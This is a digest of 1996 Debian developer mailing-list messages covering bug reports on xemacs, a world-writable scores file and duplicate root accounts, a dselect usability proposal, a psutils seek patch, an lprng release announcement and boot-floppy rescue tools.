For now, I reccommend that everyone dpkg -r abuse. Is abuse still being
maintained, or is it orphaned?

-- 
#!/usr/bin/perl -pl-   # ,,ep) ayf >|)nj,,
$_=reverse lc$_;s@"@''@g;y/[]{A-Y}<>()a-y1-9,!.?`'/][} # Joey Hess
{><)(eq)paj6y!fk7wuodbjsfn^mxhl5Eh29L86`i'%,/;[EMAIL PROTECTED]@>|@g # [EMAIL 
PROTECTED]
   "true - do nothing, successfully" - - true (1)

Bug#4592: xemacs: can't resolve symbol 'xbitmap'

[Jim Pick]

xemacs worked until this morning, when I used
dselect to upgrade some packages.

Now, when I type xemacs, I get:

fleming:~$ xemacs
xemacs: can't resolve symbol 'xbitmap'
xemacs: can't resolve symbol 'xbitmap'
xemacs: can't resolve symbol 'xbitmap'
xemacs: can't resolve symbol 'xbitmap'
xemacs: can't resolve symbol 'xbitmap'
xemacs: can't resolve symbol 'xbitmap'
fleming:~$ 

Here's what I think was upgraded:

upgraded ncftp_2.3.0-6  -->  ncftp_2.3.0-7
upgraded glimpse_3.5-3  -->  glimpse_3.6-1
upgraded dpkg_1.3.14  -->  dpkg_1.4.0
installed dpkg-dev_1.4.0
upgraded fvwm95_2.0.42a-2  -->  fvwm_2.0.42a-4
installed guile_0.4.0-3
upgraded compface_1.0-1  -->  compface_89.11.11-2

Weird eh?

I guess I'll switch back to GNU emacs for know.

 - Jim

Re: Bug#4575: World writable file

[Peter Tobias]

Christoph Lameter wrote:
> This is a game after all. I dont think we should worry about someone
> editing the scores file.

Of course we should worry about it! Somebody could fill up the /var
partition this way!


Thanks,

Peter

-- 
 Peter TobiasEMail:
 Fachhochschule Ostfriesland [EMAIL PROTECTED]
 Fachbereich Elektrotechnik und Informatik   [EMAIL PROTECTED]
 Constantiaplatz 4, 26723 Emden, Germany [EMAIL PROTECTED]

Re: Problems with dselect...

[Jeff Prothero]

Re comments such as:

| > Getting dselect to install the packages I wanted was a real pain [...]
| Yep, I didn't care much for dselect either.  [...]

1) I think dpkg / dselect / ... are tremendously important
   and impressive!  I'm used to the convenience of the SGI
   package management system, and never expected to find
   something comparable on a free, immature unix.  After
   all, that little company across the puddle here ...
   Micromind? I forget ... has never managed to produce
   a package management system for MS-Windows.  Being able
   to de-install cleanly is -SUCH- sysadmin heaven :) :) :)

2) My person suspicion is that, for every 100 seconds or so
   of manual installaction effort required, a software product
   loses about 50% of its potential market, who mutter
   "fuckit!" under their breath and go back to trying to meet
   some deadline.
 Speaking as someone who has just recently started using
   Linux, and installed it on 3-4 boxes so far, (and who
   prolly wouldn't have managed without help from Darren --
   thanks again! :) I think dselect requires WAAY too much
   interaction just to get a first install of Debian so one
   can get a sense whether it works at all and is of any
   personal interest or utility.  One really wants to
   absolutely minimize the intellectual effort required to
   get to that initial "Gee!  My own working unix!!" rush.
   (I don't think minimizing the wallclock time to that
   rush is nearly as important:  Lots of people installing
   my Muq package run the torturetest, which eats up HOURS
   of wallclock time.  But it requires no interaction
   whatever, so they wander off and check the results
   later.  What they don't wanna do is be stuck glued to
   the terminal having to make install decisions they
   don't really understand.)

Here's an attempt to turn above grumps into a constructive
proposal:

->  Introduce the idea of a "Debian configuration" -- a
complete set of packages guaranteed to work together
and constitute a complete, usable Debian install,
and actively maintained by a Debian volunteer much
as packages are currently maintained.

->  Have dselect offer the first-time user a menu of
these supported configurations at initial install,
so s/he can get a complete, working system with
minimal effort just by picking one that looks
appropriate, instead of having to learn the dselect
command set and thrash through hundreds of packages
generating conflicts and panicking when they appear
and so for.

The sort of menu I'm thinking of is:

[A]  Minimal configuration.  Just enough to run rationally.
[B]  Demo.  All the cool games &tc.  Preferably with an
 attract mode that stores can run. :)
[C]  Developer's configuration.  The basics.
[D]  Webserver configuration:  A complete working HTTP plus
 handy related tools like a full Perl with msql &tc.
[E]  Everything.  I've got 5G of disk, just install everything
 rationally possible.  (My personal preference!)

Note:  It would be VERY nice if the above menu specified the
amount of disk space required for each configuration.  It
would be even nicer if it checked available disk space and
refused impossible installs.

In general, one thing which SGI's package management does
which dpkg / dselect does not appear to do -- and which I
miss -- is careful space management:  It knows exactly how
much disk space each package takes once installed, and how
much disk space each package needs DURING installation,
and verifies that an install has sufficient space to
complete successfully before attempting a requested
de/install sequence.  Plus, it can display this info.
I find this -tremendously- useful when trying to decide
what to install, and later when deciding what to de-install
to free up enough space to operate.

Let me close by registering a fervently desired wishlist
entry for dselect version godsknowwhen :) -- add to the
standard set of Debian package scripts a "reconfig"
script, perhaps written using the portable subset of
Tcl/Tk which can be supported both on X and ascii terminals,
which allows the user to do menu-driven re/configuration of
that package.

This would allow dselect/dpkg* to serve as a central
configuration management tool for the complete Debian
Linux system, displaying all installed packages, one
hopes by then the resources such as diskspace used
by each package, and also (via the reconfig scripts)
the status of each package, with interactive menu-driven
control of that status.

Ok, I'm an impossible dreamer :)

 Cynbe

Bug#2309: Multiple root accounts

[Scott K. Ellis]

> Forwarded message from debian-devel to file as a bug report:
> 
> > Hi...
> >
> > I'd rather open this for discussion that a bug report, but I'd like to
> > have multiple root accounts (ie: root, root2, root3 etc) on one system -
> > however it buggers adduser up when adding a normal user.
> >
> > I've tried making 5 root accounts all with UID/GID 0:0, and when I run
> > adduser it tries to allocate UID 1000 (which is already taken my my
> > normal account) and write that username before mine with UID 1000 in
> > the passwd file.  If I take the additional root accounts out then there is
> > no problem with adduser.
> >
> > Is there a way around this?

Not really much in the way of a fix, but is there a reason that you
can't use sudo or super to acomplish what you want multiple root
accounts for?  Having multiple accounts with the same UID is a good way
to confuse a lot of different things.

Re: Can't contact Bill Mitchell

[Susan G. Kleinmann]

Hi Dale --

> When I try to send e-mail to Bill at: [EMAIL PROTECTED] I get a no
> such user error. Does anyone have a good contact address for Bill?

Bill sent a message to debian-devel a few days ago from this address:

[EMAIL PROTECTED]

> Better yet, does anyone have a copy of the patch we did on less to fix the
> problem reading proc files?
> 

I think this is the message you are looking for is the one attached below.

Cheers,
Susan
==

Date: Thu, 30 May 96 17:30 CDT
From: Mike Coleman <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
CC: [EMAIL PROTECTED], debian-devel@lists.debian.org,
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: psutils and pipes bug

   Date: Thu, 30 May 1996 12:29:03 -0500
   From: Lukas Nellen <[EMAIL PROTECTED]>

   Unfortunately, that doesn't solve the problem. Could the problem be
   related to the libraries you link psutils with? The version of libc on
   my system is:
   libc5   5.2.18-6 
   which is the only shared library used by psnup and pstops. Or could
   there be another difference between our systems which might be
   relevant? 

The problem seems to be one or both of: (1) a change in the way psutils
decides whether a file is seekable or not, and (2) libc's (possibly changed)
optimization of fseeks.

Specifically, the current version of psutils decides whether a file is
seekable by SEEK_CUR with 0 as the arg (which is a no-op seek to the current
position), checking to see whether this generates an error.  Libc, however,
optimizes this fseek away (i.e., without calling lseek), and doesn't generate
an error.

The attached patch seems like a reasonable fix.  It tests seekability by
seeking to EOF and back to the current point, checking for errors.

(I'm also Cc:'ing Angus (author of psutils) on this.)

--Mike

P.S.  One of the debian.* files mentions [EMAIL PROTECTED] as the package
maintainer.  Is this really the same as [EMAIL PROTECTED] or a typo?


--- psutil.c~   Mon Feb 19 11:27:19 1996
+++ psutil.cThu May 30 17:15:16 1996
@@ -82,6 +82,7 @@
FILE *ft;
long r, w;
char *p;
+   long fp_pos;
 #if defined(WINNT)
struct _stat fs ;
 #endif
@@ -90,8 +91,9 @@
if (_fstat(fileno(fp), &fs) == 0 && (fs.st_mode&_S_IFREG) != 0)
  return (fp);
 #else
-   if (!fseek(fp, 0L, SEEK_CUR))
- return (fp);
+   if ((fp_pos = ftell(fp)) >= 0)
+  if (!fseek(fp, 0L, SEEK_END) && !fseek(fp, fp_pos, SEEK_SET))
+return (fp);
 #endif
 
 #if defined(MSDOS)

lprng_2.3.12 released (experimental)

[Sven Rudolph]

I intend to replace the lpr package by lprng.

This is the first release of lprng; please test it.

Before installing this package you have to remove lpr by calling 'dpkg
-r lpr' ; I will add the Conflicts and Replaces fields in the next
release.

The old lpr package had some facility for invoking ghostscript on PS
files; this new package doesn't provide this. The old method still
required manual entries to /etc/filter.* ; IMHO the automatic
conversion is magicfilter's job. (I could add a Recommends:
magicfilter)

Sven

-BEGIN PGP SIGNED MESSAGE-

Format: 1.5
Date: Tue, 17 Sep 1996 23:32:15 +0200
Source: lprng
Binary: lprng
Architecture: source i386
Version: 2.3.12-1
Distribution: experimental
Urgency: low
Maintainer: Sven Rudolph <[EMAIL PROTECTED]>
Description: 
 lprng  - Berkeley lpr/lpd line printer spooling system
Changes: 
 lprng (2.3.12-1) experimental; urgency=low
 .
   * added minimal printcap
   * run daemon as lp
   * install daemon and admin programs in /usr/sbin
   * Initial release.
Files: 
 fe3e8a2231db86310283be0cbab684a2 602 net optional lprng_2.3.12-1.dsc
 f1c23e214a752e1c2dab2399b3457d2d 634830 net optional lprng_2.3.12.orig.tar.gz
 c271eedce69bb5e63c2aa23f6b42612d 4349 net optional lprng_2.3.12-1.diff.gz
 ad510a05b5f3bcbbdf2b7e3015b030b7 448222 net optional lprng_2.3.12-1_i386.deb

-BEGIN PGP SIGNATURE-
Version: 2.6.2i

iQCVAwUBMkmrZvcN927BSdxBAQF/XQP/WuXlm8ubkTbxHMsPp5aaIeoU8//tGZ8b
mUhlodVsDqtLNEPcVQWUGWxpXHfrSeNlMxDAUAJx+/oKbZZmZvob7EzzvX/ySXLj
Se3EwCb5QRWYBJ02bVKgjRM1ueVl3obj/8sTYw8cBLr0IGhFowGjcxsZaPeBy0GT
aLf9kkaRdBE=
=9Uuw
-END PGP SIGNATURE-


-- 
Sven Rudolph <[EMAIL PROTECTED]> ; WWW : http://www.sax.de/~sr1/

Re: config scripts on root disk

[Bruce Perens]

It is indeed possible to put the configuration scripts in a package.
However, it doesn't go on the base system, it's installed on a
mini-root floppy.  I will split the boot-floppies package into several
packages, and these will include a package for the configuration
scripts. When that's done, I will put these packages up for other
maintainers to take over.

Thanks

Bruce

Re: Rescue disk for Debian?

[Bruce Perens]

The boot floppies contain a program called "star" that extracts a tar on
the standard input. Someone could beef this up a bit or at least document
it. The boot floppies make a reasonable rescue disk set now.

Thanks

Bruce